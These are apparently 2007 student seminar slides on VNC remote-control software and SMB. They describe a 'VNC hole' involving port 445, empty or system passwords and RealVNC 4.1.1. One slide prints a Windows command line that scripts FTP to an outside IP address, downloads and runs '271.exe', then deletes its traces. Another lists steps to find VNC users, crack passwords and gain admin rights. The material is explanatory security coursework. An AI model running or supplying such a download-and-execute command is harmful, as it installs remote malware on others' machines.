VNC

1. VNC Speaker: Changyu Wu Adviser: Quincy Wu Date:2007/03/05

2. Overview • Introduction • SMB (server message block) • VNC’ hole • Sample test • Reference

3. Introduction • VNC (Virtual Network Computing ) • It is remote control software which allows you to view and fully interact with one computer desktop • The "VNC server" using a simple program the "VNC viewer” on another computer desktop anywhere on the Internet • Client application program “vncviewer” • Server application program “vncserver” • http://www.realvnc.com/what.html

4. Introduction (cont)

5. SMB • SMB (server message block) • Provides a method for client applications in a computer to read and write to files on and to request services from server programs in a computer network. • Can access files at a remote server server as well as other resources, including printers. • Ex: Microsoft windows unix Samba

6. VNC’ hole • Microsoft windows (95 、98 、 ME 、 NT) • 137/tcp udp、138/udp • Microsoft windows(2000 、XP) • 445/tcp • Listen 445/tcp • Test empty string or system password get admin power • RealVNC 4.1.1 • cmd.exe /c del i&echo open 163.22.244.172 16664 > i&echo user 1 1 >> i &echo get 271.exe >> i &echo quit >> i &ftp -n -s:i &271.exe&del i&exit

7. Sample test • Step1:Use VNCFlawTest.exe find VNC user • Step2:Crack password • Step3:Get admin power

8. Reference • Real VNC • http://www.pcnet.idv.tw/pcnet/soft/soft_vnc.htm • Encyclopedia of technology terms • GSN-CERT/CC news • http://www.gsn-cert.nat.gov.tw/news116.html